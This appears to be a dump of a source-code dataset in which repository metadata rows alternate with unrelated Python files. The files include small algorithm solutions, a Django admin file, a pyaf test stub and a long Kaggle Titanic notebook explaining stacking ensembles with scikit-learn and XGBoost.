@classmethod
def validate_type(cls, operator: Operator, operand: IType) -> Optional[UnaryOperation]:
"""
Gets a unary operation given the operator and the operand type.
:param operator: unary operator
:param operand: type of the operand
:return: The operation if exists. None otherwise;
:rtype: UnaryOperation or None
"""
for id, op in vars(cls).items():
if isinstance(op, UnaryOperation) and op.is_valid(operator, operand):
return op.build(operand)
@classmethod
def get_operation_by_operator(cls, operator: Operator) -> Optional[UnaryOperation]:
"""
Gets a unary operation given the operator.
:param operator: unary operator
:return: The operation if exists. If exists more than one operation with the same operator, returns the first
found. None otherwise.
:rtype: UnaryOperation or None
"""
for id, op in vars(cls).items():
if isinstance(op, UnaryOperation) and op.operator is operator:
return op
@classmethod
def get_operation(cls, operation: UnaryOperation) -> Optional[UnaryOperation]:
"""
Gets an unary operation given another operation.
:param operation: unary operation
:return: The operation if exists. None otherwise;
:rtype: UnaryOperation or None
"""
for id, op in vars(cls).items():
if type(operation) == type(op):
return op
| [
"[email protected]"
]
| |
030b4c362a080ed3fefaefec7c4a04c2570a0144 | 8f7b7a910520ba49a2e614da72f7b6297f617409 | /Problemset/isomorphic-strings/isomorphic-strings.py | bfd41976cf490a5bac150110e345392d060325ff | []
| no_license | fank-cd/python_leetcode | 69c4466e9e202e48502252439b4cc318712043a2 | 61f07d7c7e76a1eada21eb3e6a1a177af3d56948 | refs/heads/master | 2021-06-16T23:41:55.591095 | 2021-03-04T08:31:47 | 2021-03-04T08:31:47 | 173,226,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py |
# @Title: 同构字符串 (Isomorphic Strings)
# @Author: [email protected]
# @Date: 2020-12-28 16:12:46
# @Runtime: 48 ms
# @Memory: 17.1 MB
class Solution:
def isIsomorphic(self, s: str, t: str) -> bool:
d1,d2 = defaultdict(list), defaultdict(list)
for index,i in enumerate(s):
d1[i].append(index)
for index,i in enumerate(t):
d2[i].append(index)
# print(list(d1.values()),list(d2.values()))
return list(d1.values()) == list(d2.values())
| [
"[email protected]"
]
| |
1f30f5e4102fbbdca71b5f19949cadfb232dfb14 | a42d5b8e53660db5b33d4cb3e9350eb983639cd8 | /board/admin.py | d39fd3a5723f23155ad3e5430bbb5406e68ef879 | []
| no_license | Tedhoon/SPNU_DP | 03a0b3e6ae5fa0cf045617ef1da6c14f1084202b | 3776417fc5d3cb099d6f7029d6864d58b5e535b6 | refs/heads/master | 2022-11-29T15:20:31.594799 | 2019-10-17T17:18:04 | 2019-10-17T17:18:04 | 211,781,362 | 1 | 0 | null | 2022-11-22T04:16:33 | 2019-09-30T05:23:59 | CSS | UTF-8 | Python | false | false | 123 | py | from django.contrib import admin
from .models import *
admin.site.register(NoticeBoard)
admin.site.register(FreeBoard) | [
"[email protected]"
]
| |
ec1d53bcb53a59ed0b3cf5cdec093ad9456263da | a560269290749e10466b1a29584f06a2b8385a47 | /Notebooks/py/alberto33/introduction-to-ensembling-stacking-in-python/introduction-to-ensembling-stacking-in-python.py | 697cfa42405f34ec019f187864f73b14e61421cd | []
| no_license | nischalshrestha/automatic_wat_discovery | c71befad1aa358ae876d5494a67b0f4aa1266f23 | 982e700d8e4698a501afffd6c3a2f35346c34f95 | refs/heads/master | 2022-04-07T12:40:24.376871 | 2020-03-15T22:27:39 | 2020-03-15T22:27:39 | 208,379,586 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 29,957 | py | #!/usr/bin/env python
# coding: utf-8
# # Introduction
#
# This notebook is a very basic and simple introductory primer to the method of ensembling (combining) base learning models, in particular the variant of ensembling known as Stacking. In a nutshell stacking uses as a first-level (base), the predictions of a few basic classifiers and then uses another model at the second-level to predict the output from the earlier first-level predictions.
#
# The Titanic dataset is a prime candidate for introducing this concept as many newcomers to Kaggle start out here. Furthermore even though stacking has been responsible for many a team winning Kaggle competitions there seems to be a dearth of kernels on this topic so I hope this notebook can fill somewhat of that void.
#
# I myself am quite a newcomer to the Kaggle scene as well and the first proper ensembling/stacking script that I managed to chance upon and study was one written in the AllState Severity Claims competition by the great Faron. The material in this notebook borrows heavily from Faron's script although ported to factor in ensembles of classifiers whilst his was ensembles of regressors. Anyway please check out his script here:
#
# [Stacking Starter][1] : by Faron
#
#
# Now onto the notebook at hand and I hope that it manages to do justice and convey the concept of ensembling in an intuitive and concise manner. My other standalone Kaggle [script][2] which implements exactly the same ensembling steps (albeit with different parameters) discussed below gives a Public LB score of 0.808 which is good enough to get to the top 9% and runs just under 4 minutes. Therefore I am pretty sure there is a lot of room to improve and add on to that script. Anyways please feel free to leave me any comments with regards to how I can improve
#
#
# [1]: https://www.kaggle.com/mmueller/allstate-claims-severity/stacking-starter/run/390867
# [2]: https://www.kaggle.com/arthurtok/titanic/simple-stacking-with-xgboost-0-808
# In[ ]:
# Load in our libraries
import pandas as pd
import numpy as np
import re
import sklearn
import xgboost as xgb
import seaborn as sns
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
import plotly.offline as py
py.init_notebook_mode(connected=True)
import plotly.graph_objs as go
import plotly.tools as tls
import warnings
warnings.filterwarnings('ignore')
# Going to use these 5 base models for the stacking
from sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier,
GradientBoostingClassifier, ExtraTreesClassifier)
from sklearn.svm import SVC
from sklearn.cross_validation import KFold
# # Feature Exploration, Engineering and Cleaning
#
# Now we will proceed much like how most kernels in general are structured, and that is to first explore the data on hand, identify possible feature engineering opportunities as well as numerically encode any categorical features.
# In[ ]:
# Load in the train and test datasets
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
# Store our passenger ID for easy access
PassengerId = test['PassengerId']
train.head(3)
# Well it is no surprise that our task is to somehow extract the information out of the categorical variables
#
# **Feature Engineering**
#
# Here, credit must be extended to Sina's very comprehensive and well-thought out notebook for the feature engineering ideas so please check out his work
#
# [Titanic Best Working Classfier][1] : by Sina
#
#
# [1]: https://www.kaggle.com/sinakhorami/titanic/titanic-best-working-classifier
# In[ ]:
full_data = [train, test]
# Some features of my own that I have added in
# Gives the length of the name
train['Name_length'] = train['Name'].apply(len)
test['Name_length'] = test['Name'].apply(len)
# Feature that tells whether a passenger had a cabin on the Titanic
train['Has_Cabin'] = train["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
test['Has_Cabin'] = test["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
# Feature engineering steps taken from Sina
# Create new feature FamilySize as a combination of SibSp and Parch
for dataset in full_data:
dataset['FamilySize'] = dataset['SibSp'] + dataset['Parch'] + 1
# Create new feature IsAlone from FamilySize
for dataset in full_data:
dataset['IsAlone'] = 0
dataset.loc[dataset['FamilySize'] == 1, 'IsAlone'] = 1
# Remove all NULLS in the Embarked column
for dataset in full_data:
dataset['Embarked'] = dataset['Embarked'].fillna('S')
# Remove all NULLS in the Fare column and create a new feature CategoricalFare
for dataset in full_data:
dataset['Fare'] = dataset['Fare'].fillna(train['Fare'].median())
train['CategoricalFare'] = pd.qcut(train['Fare'], 4)
# Create a New feature CategoricalAge
for dataset in full_data:
age_avg = dataset['Age'].mean()
age_std = dataset['Age'].std()
age_null_count = dataset['Age'].isnull().sum()
age_null_random_list = np.random.randint(age_avg - age_std, age_avg + age_std, size=age_null_count)
dataset['Age'][np.isnan(dataset['Age'])] = age_null_random_list
dataset['Age'] = dataset['Age'].astype(int)
train['CategoricalAge'] = pd.cut(train['Age'], 5)
# Define function to extract titles from passenger names
def get_title(name):
title_search = re.search(' ([A-Za-z]+)\.', name)
# If the title exists, extract and return it.
if title_search:
return title_search.group(1)
return ""
# Create a new feature Title, containing the titles of passenger names
for dataset in full_data:
dataset['Title'] = dataset['Name'].apply(get_title)
# Group all non-common titles into one single grouping "Rare"
for dataset in full_data:
dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col','Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare')
dataset['Title'] = dataset['Title'].replace('Mlle', 'Miss')
dataset['Title'] = dataset['Title'].replace('Ms', 'Miss')
dataset['Title'] = dataset['Title'].replace('Mme', 'Mrs')
for dataset in full_data:
# Mapping Sex
dataset['Sex'] = dataset['Sex'].map( {'female': 0, 'male': 1} ).astype(int)
# Mapping titles
title_mapping = {"Mr": 1, "Miss": 2, "Mrs": 3, "Master": 4, "Rare": 5}
dataset['Title'] = dataset['Title'].map(title_mapping)
dataset['Title'] = dataset['Title'].fillna(0)
# Mapping Embarked
dataset['Embarked'] = dataset['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)
# Mapping Fare
dataset.loc[ dataset['Fare'] <= 7.91, 'Fare'] = 0
dataset.loc[(dataset['Fare'] > 7.91) & (dataset['Fare'] <= 14.454), 'Fare'] = 1
dataset.loc[(dataset['Fare'] > 14.454) & (dataset['Fare'] <= 31), 'Fare'] = 2
dataset.loc[ dataset['Fare'] > 31, 'Fare'] = 3
dataset['Fare'] = dataset['Fare'].astype(int)
# Mapping Age
dataset.loc[ dataset['Age'] <= 16, 'Age'] = 0
dataset.loc[(dataset['Age'] > 16) & (dataset['Age'] <= 32), 'Age'] = 1
dataset.loc[(dataset['Age'] > 32) & (dataset['Age'] <= 48), 'Age'] = 2
dataset.loc[(dataset['Age'] > 48) & (dataset['Age'] <= 64), 'Age'] = 3
dataset.loc[ dataset['Age'] > 64, 'Age'] = 4 ;
# In[ ]:
# Feature selection
drop_elements = ['PassengerId', 'Name', 'Ticket', 'Cabin', 'SibSp']
train = train.drop(drop_elements, axis = 1)
train = train.drop(['CategoricalAge', 'CategoricalFare'], axis = 1)
test = test.drop(drop_elements, axis = 1)
# All right so now having cleaned the features and extracted relevant information and dropped the categorical columns our features should now all be numeric, a format suitable to feed into our Machine Learning models. However before we proceed let us generate some simple correlation and distribution plots of our transformed dataset to observe ho
#
# ## Visualisations
# In[ ]:
train.head(3)
# **Pearson Correlation Heatmap**
#
# let us generate some correlation plots of the features to see how related one feature is to the next. To do so, we will utilise the Seaborn plotting package which allows us to plot heatmaps very conveniently as follows
# In[ ]:
colormap = plt.cm.RdBu
plt.figure(figsize=(15,15))
plt.title('Pearson Correlation of Features 2', y=1.05, size=15)
sns.heatmap(train.astype(float).corr(),linewidths=0.1,vmax=1.0,
square=False, cmap=colormap, linecolor='black', annot=True)
# **Takeaway from the Plots**
#
# One thing that that the Pearson Correlation plot can tell us is that there are not too many features strongly correlated with one another. This is good from a point of view of feeding these features into your learning model because this means that there isn't much redundant or superfluous data in our training set and we are happy that each feature carries with it some unique information. Here are two most correlated features are that of Family size and Parch (Parents and Children). I'll still leave both features in for the purposes of this exercise.
#
# **Pairplots**
#
# Finally let us generate some pairplots to observe the distribution of data from one feature to the other. Once again we use Seaborn to help us.
# In[ ]:
g = sns.pairplot(train[[u'Survived', u'Pclass', u'Sex', u'Age', u'Parch', u'Fare', u'Embarked',
u'FamilySize', u'IsAlone', u'Title']], hue='Survived', palette = 'seismic',size=1.2,diag_kind = 'kde',diag_kws=dict(shade=True),plot_kws=dict(s=10) )
g.set(xticklabels=[])
# # Ensembling & Stacking models
#
# Finally after that brief whirlwind detour with regards to feature engineering and formatting, we finally arrive at the meat and gist of the this notebook.
#
# Creating a Stacking ensemble!
# ### Helpers via Python Classes
#
# Here we invoke the use of Python's classes to help make it more convenient for us. For any newcomers to programming, one normally hears Classes being used in conjunction with Object-Oriented Programming (OOP). In short, a class helps to extend some code/program for creating objects (variables for old-school peeps) as well as to implement functions and methods specific to that class.
#
# In the section of code below, we essentially write a class *SklearnHelper* that allows one to extend the inbuilt methods (such as train, predict and fit) common to all the Sklearn classifiers. Therefore this cuts out redundancy as won't need to write the same methods five times if we wanted to invoke five different classifiers.
# In[ ]:
# Some useful parameters which will come in handy later on
ntrain = train.shape[0]
ntest = test.shape[0]
SEED = 0 # for reproducibility
NFOLDS = 5 # set folds for out-of-fold prediction
kf = KFold(ntrain, n_folds= NFOLDS, random_state=SEED)
# Class to extend the Sklearn classifier
class SklearnHelper(object):
def __init__(self, clf, seed=0, params=None):
params['random_state'] = seed
self.clf = clf(**params)
def train(self, x_train, y_train):
self.clf.fit(x_train, y_train)
def predict(self, x):
return self.clf.predict(x)
def fit(self,x,y):
return self.clf.fit(x,y)
def feature_importances(self,x,y):
print(self.clf.fit(x,y).feature_importances_)
# Class to extend XGboost classifer
# Bear with me for those who already know this but for people who have not created classes or objects in Python before, let me explain what the code given above does. In creating my base classifiers, I will only use the models already present in the Sklearn library and therefore only extend the class for that.
#
# **def init** : Python standard for invoking the default constructor for the class. This means that when you want to create an object (classifier), you have to give it the parameters of clf (what sklearn classifier you want), seed (random seed) and params (parameters for the classifiers).
#
# The rest of the code are simply methods of the class which simply call the corresponding methods already existing within the sklearn classifiers. Essentially, we have created a wrapper class to extend the various Sklearn classifiers so that this should help us reduce having to write the same code over and over when we implement multiple learners to our stacker.
# ### Out-of-Fold Predictions
#
# Now as alluded to above in the introductory section, stacking uses predictions of base classifiers as input for training to a second-level model. However one cannot simply train the base models on the full training data, generate predictions on the full test set and then output these for the second-level training. This runs the risk of your base model predictions already having "seen" the test set and therefore overfitting when feeding these predictions.
# In[ ]:
def get_oof(clf, x_train, y_train, x_test):
oof_train = np.zeros((ntrain,))
oof_test = np.zeros((ntest,))
oof_test_skf = np.empty((NFOLDS, ntest))
for i, (train_index, test_index) in enumerate(kf):
x_tr = x_train[train_index]
y_tr = y_train[train_index]
x_te = x_train[test_index]
clf.train(x_tr, y_tr)
oof_train[test_index] = clf.predict(x_te)
oof_test_skf[i, :] = clf.predict(x_test)
oof_test[:] = oof_test_skf.mean(axis=0)
return oof_train.reshape(-1, 1), oof_test.reshape(-1, 1)
# # Generating our Base First-Level Models
#
# So now let us prepare five learning models as our first level classification. These models can all be conveniently invoked via the Sklearn library and are listed as follows:
#
# 1. Random Forest classifier
# 2. Extra Trees classifier
# 3. AdaBoost classifer
# 4. Gradient Boosting classifer
# 5. Support Vector Machine
# **Parameters**
#
# Just a quick summary of the parameters that we will be listing here for completeness,
#
# **n_jobs** : Number of cores used for the training process. If set to -1, all cores are used.
#
# **n_estimators** : Number of classification trees in your learning model ( set to 10 per default)
#
# **max_depth** : Maximum depth of tree, or how much a node should be expanded. Beware if set to too high a number would run the risk of overfitting as one would be growing the tree too deep
#
# **verbose** : Controls whether you want to output any text during the learning process. A value of 0 suppresses all text while a value of 3 outputs the tree learning process at every iteration.
#
# Please check out the full description via the official Sklearn website. There you will find that there are a whole host of other useful parameters that you can play around with.
# In[ ]:
# Put in our parameters for said classifiers
# Random Forest parameters
rf_params = {
'n_jobs': -1,
'n_estimators': 500,
'warm_start': True,
#'max_features': 0.2,
'max_depth': 6,
'min_samples_leaf': 2,
'max_features' : 'sqrt',
'verbose': 0
}
# Extra Trees Parameters
et_params = {
'n_jobs': -1,
'n_estimators':500,
#'max_features': 0.5,
'max_depth': 8,
'min_samples_leaf': 2,
'verbose': 0
}
# AdaBoost parameters
ada_params = {
'n_estimators': 500,
'learning_rate' : 0.75
}
# Gradient Boosting parameters
gb_params = {
'n_estimators': 500,
#'max_features': 0.2,
'max_depth': 5,
'min_samples_leaf': 2,
'verbose': 0
}
# Support Vector Classifier parameters
svc_params = {
'kernel' : 'linear',
'C' : 0.025
}
# Furthermore, since having mentioned about Objects and classes within the OOP framework, let us now create 5 objects that represent our 5 learning models via our Helper Sklearn Class we defined earlier.
# In[ ]:
# Create 5 objects that represent our 4 models
rf = SklearnHelper(clf=RandomForestClassifier, seed=SEED, params=rf_params)
et = SklearnHelper(clf=ExtraTreesClassifier, seed=SEED, params=et_params)
ada = SklearnHelper(clf=AdaBoostClassifier, seed=SEED, params=ada_params)
gb = SklearnHelper(clf=GradientBoostingClassifier, seed=SEED, params=gb_params)
svc = SklearnHelper(clf=SVC, seed=SEED, params=svc_params)
# **Creating NumPy arrays out of our train and test sets**
#
# Great. Having prepared our first layer base models as such, we can now ready the training and test test data for input into our classifiers by generating NumPy arrays out of their original dataframes as follows:
# In[ ]:
# Create Numpy arrays of train, test and target ( Survived) dataframes to feed into our models
y_train = train['Survived'].ravel()
train = train.drop(['Survived'], axis=1)
x_train = train.values # Creates an array of the train data
x_test = test.values # Creats an array of the test data
# **Output of the First level Predictions**
#
# We now feed the training and test data into our 5 base classifiers and use the Out-of-Fold prediction function we defined earlier to generate our first level predictions. Allow a handful of minutes for the chunk of code below to run.
# In[ ]:
# Create our OOF train and test predictions. These base results will be used as new features
et_oof_train, et_oof_test = get_oof(et, x_train, y_train, x_test) # Extra Trees
rf_oof_train, rf_oof_test = get_oof(rf,x_train, y_train, x_test) # Random Forest
ada_oof_train, ada_oof_test = get_oof(ada, x_train, y_train, x_test) # AdaBoost
gb_oof_train, gb_oof_test = get_oof(gb,x_train, y_train, x_test) # Gradient Boost
svc_oof_train, svc_oof_test = get_oof(svc,x_train, y_train, x_test) # Support Vector Classifier
print("Training is complete")
# **Feature importances generated from the different classifiers**
#
# Now having learned our the first-level classifiers, we can utilise a very nifty feature of the Sklearn models and that is to output the importances of the various features in the training and test sets with one very simple line of code.
#
# As per the Sklearn documentation, most of the classifiers are built in with an attribute which returns feature importances by simply typing in **.feature_importances_**. Therefore we will invoke this very useful attribute via our function earliand plot the feature importances as such
# In[ ]:
rf_feature = rf.feature_importances(x_train,y_train)
et_feature = et.feature_importances(x_train, y_train)
ada_feature = ada.feature_importances(x_train, y_train)
gb_feature = gb.feature_importances(x_train,y_train)
# So I have not yet figured out how to assign and store the feature importances outright. Therefore I'll print out the values from the code above and then simply copy and paste into Python lists as below (sorry for the lousy hack)
# In[ ]:
rf_features = [0.10474135, 0.21837029, 0.04432652, 0.02249159, 0.05432591, 0.02854371
,0.07570305, 0.01088129 , 0.24247496, 0.13685733 , 0.06128402]
et_features = [ 0.12165657, 0.37098307 ,0.03129623 , 0.01591611 , 0.05525811 , 0.028157
,0.04589793 , 0.02030357 , 0.17289562 , 0.04853517, 0.08910063]
ada_features = [0.028 , 0.008 , 0.012 , 0.05866667, 0.032 , 0.008
,0.04666667 , 0. , 0.05733333, 0.73866667, 0.01066667]
gb_features = [ 0.06796144 , 0.03889349 , 0.07237845 , 0.02628645 , 0.11194395, 0.04778854
,0.05965792 , 0.02774745, 0.07462718, 0.4593142 , 0.01340093]
# Create a dataframe from the lists containing the feature importance data for easy plotting via the Plotly package.
# In[ ]:
cols = train.columns.values
# Create a dataframe with features
feature_dataframe = pd.DataFrame( {'features': cols,
'Random Forest feature importances': rf_features,
'Extra Trees feature importances': et_features,
'AdaBoost feature importances': ada_features,
'Gradient Boost feature importances': gb_features
})
# **Interactive feature importances via Plotly scatterplots**
#
# I'll use the interactive Plotly package at this juncture to visualise the feature importances values of the different classifiers via a plotly scatter plot by calling "Scatter" as follows:
# In[ ]:
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['Random Forest feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['Random Forest feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'Random Forest Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['Extra Trees feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['Extra Trees feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'Extra Trees Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['AdaBoost feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['AdaBoost feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'AdaBoost Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Scatter plot
trace = go.Scatter(
y = feature_dataframe['Gradient Boost feature importances'].values,
x = feature_dataframe['features'].values,
mode='markers',
marker=dict(
sizemode = 'diameter',
sizeref = 1,
size = 25,
# size= feature_dataframe['AdaBoost feature importances'].values,
#color = np.random.randn(500), #set color equal to a variable
color = feature_dataframe['Gradient Boost feature importances'].values,
colorscale='Portland',
showscale=True
),
text = feature_dataframe['features'].values
)
data = [trace]
layout= go.Layout(
autosize= True,
title= 'Gradient Boosting Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig,filename='scatter2010')
# Now let us calculate the mean of all the feature importances and store it as a new column in the feature importance dataframe.
# In[ ]:
# Create the new column containing the average of values
feature_dataframe['mean'] = feature_dataframe.mean(axis= 1) # axis = 1 computes the mean row-wise
feature_dataframe.head(3)
# **Plotly Barplot of Average Feature Importances**
#
# Having obtained the mean feature importance across all our classifiers, we can plot them into a Plotly bar plot as follows:
# In[ ]:
y = feature_dataframe['mean'].values
x = feature_dataframe['features'].values
data = [go.Bar(
x= x,
y= y,
width = 0.5,
marker=dict(
color = feature_dataframe['mean'].values,
colorscale='Portland',
showscale=True,
reversescale = False
),
opacity=0.6
)]
layout= go.Layout(
autosize= True,
title= 'Barplots of Mean Feature Importance',
hovermode= 'closest',
# xaxis= dict(
# title= 'Pop',
# ticklen= 5,
# zeroline= False,
# gridwidth= 2,
# ),
yaxis=dict(
title= 'Feature Importance',
ticklen= 5,
gridwidth= 2
),
showlegend= False
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig, filename='bar-direct-labels')
# # Second-Level Predictions from the First-level Output
# **First-level output as new features**
#
# Having now obtained our first-level predictions, one can think of it as essentially building a new set of features to be used as training data for the next classifier. As per the code below, we are therefore having as our new columns the first-level predictions from our earlier classifiers and we train the next classifier on this.
# In[ ]:
base_predictions_train = pd.DataFrame( {'RandomForest': rf_oof_train.ravel(),
'ExtraTrees': et_oof_train.ravel(),
'AdaBoost': ada_oof_train.ravel(),
'GradientBoost': gb_oof_train.ravel()
})
base_predictions_train.head()
# **Correlation Heatmap of the Second Level Training set**
# In[ ]:
data = [
go.Heatmap(
z= base_predictions_train.astype(float).corr().values ,
x=base_predictions_train.columns.values,
y= base_predictions_train.columns.values,
colorscale='Viridis',
showscale=True,
reversescale = True
)
]
py.iplot(data, filename='labelled-heatmap')
# There have been quite a few articles and Kaggle competition winner stories about the merits of having trained models that are more uncorrelated with one another producing better scores.
# In[ ]:
x_train = np.concatenate(( et_oof_train, rf_oof_train, ada_oof_train, gb_oof_train, svc_oof_train), axis=1)
x_test = np.concatenate(( et_oof_test, rf_oof_test, ada_oof_test, gb_oof_test, svc_oof_test), axis=1)
# Having now concatenated and joined both the first-level train and test predictions as x_train and x_test, we can now fit a second-level learning model.
# ### Second level learning model via XGBoost
#
# Here we choose the eXtremely famous library for boosted tree learning model, XGBoost. It was built to optimize large-scale boosted tree algorithms. For further information about the algorithm, check out the [official documentation][1].
#
# [1]: https://xgboost.readthedocs.io/en/latest/
#
# Anyways, we call an XGBClassifier and fit it to the first-level train and target data and use the learned model to predict the test data as follows:
# In[ ]:
gbm = xgb.XGBClassifier(
#learning_rate = 0.02,
n_estimators= 2000,
max_depth= 4,
min_child_weight= 2,
#gamma=1,
gamma=0.9,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread= -1,
scale_pos_weight=1).fit(x_train, y_train)
predictions = gbm.predict(x_test)
# Just a quick run down of the XGBoost parameters used in the model:
#
# **max_depth** : How deep you want to grow your tree. Beware if set to too high a number might run the risk of overfitting.
#
# **gamma** : minimum loss reduction required to make a further partition on a leaf node of the tree. The larger, the more conservative the algorithm will be.
#
# **eta** : step size shrinkage used in each boosting step to prevent overfitting
# **Producing the Submission file**
#
# Finally having trained and fit all our first-level and second-level models, we can now output the predictions into the proper format for submission to the Titanic competition as follows:
# In[ ]:
# Generate Submission File
StackingSubmission = pd.DataFrame({ 'PassengerId': PassengerId,
'Survived': predictions })
StackingSubmission.to_csv("StackingSubmission.csv", index=False)
# **Steps for Further Improvement**
#
# As a closing remark it must be noted that the steps taken above just show a very simple way of producing an ensemble stacker. You hear of ensembles created at the highest level of Kaggle competitions which involves monstrous combinations of stacked classifiers as well as levels of stacking which go to more than 2 levels.
#
# Some additional steps that may be taken to improve one's score could be:
#
# 1. Implementing a good cross-validation strategy in training the models to find optimal parameter values
# 2. Introduce a greater variety of base models for learning. The more uncorrelated the results, the better the final score.
# ### Conclusion
#
# I have this notebook has been helpful somewhat in introducing a working script for stacking learning models. Again credit must be extended to Faron and Sina.
#
# For other excellent material on stacking or ensembling in general, refer to the de-facto Must read article on the website MLWave: [Kaggle Ensembling Guide][1].
#
# Till next time, Peace Out
#
# [1]: http://mlwave.com/kaggle-ensembling-guide/
# In[ ]:
| [
"[email protected]"
]
| |
0f61974c5e834f3cba8ffe47ed15b4b1a1f3aba8 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_127/118.py | d4733f2f4831c105eb5335bfcd752027eea7d78a | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | import math
def get_number_of_test_case():
return int(raw_input().strip())
def ans(x, y, n):
if n == 1:
if abs(x) + abs(y) != 1:
return False
elif x == 1:
return 'E'
elif x == -1:
return 'W'
elif y == 1:
return 'N'
elif y == -1:
return 'S'
else:
threshold = (n * (n - 1) / 2)
for item in [[x + n, y, 'W',], [x - n, y, 'E',], [x, y + n, 'S',], [x, y - n, 'N',]]:
if abs(item[0]) + abs(item[1]) <= threshold:
result = ans(item[0], item[1], n - 1)
if result:
return result + item[2]
return False
def solve_case(t):
x, y = [int(i) for i in raw_input().strip().split()]
z = abs(x) + abs(y)
n = int(math.ceil((math.sqrt(z * 8 + 1) - 1) / 2))
found = False
result = ''
while not found:
result = ans(x, y, n)
if result:
found = True
n += 1
print 'Case #%d: %s' % (t, result,)
T = get_number_of_test_case()
t = 1
while t <= T:
solve_case(t)
t += 1
| [
"[email protected]"
]
| |
d6d823f39170c014d0a11739f5a3ab7b90f9178c | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4347/codes/1793_1595.py | 05495cd7b509876291eb94882aeab29cc3d2410f | []
| no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | from numpy import*
n=array(eval(input("nota dos alunos")))
h=0
t=0
while(size(n)>h):
t=t+n[h]
h=h+1
t=t-min(n)
y=size(n)
y=y-1
t=t/y
print(round(t,2))
| [
"[email protected]"
]
| |
ba8ea0976052895c62f71ec036fb295afc85a666 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_BoxCox/model_control_one_enabled_BoxCox_LinearTrend_Seasonal_Minute_AR.py | 8af17b88b486c656cac6b7a11b9ebc140c4f4ea5 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 161 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['BoxCox'] , ['LinearTrend'] , ['Seasonal_Minute'] , ['AR'] ); | [
"[email protected]"
]
| |
557c6f588642ff8207591f649b68e0f4d5928909 | dfc991b4163bca9192985bc6daa12168283ffac8 | /test/aqua/operators/__init__.py | 7909fc6dac6c123e255fc08303846d478c8de9e3 | [
"Apache-2.0",
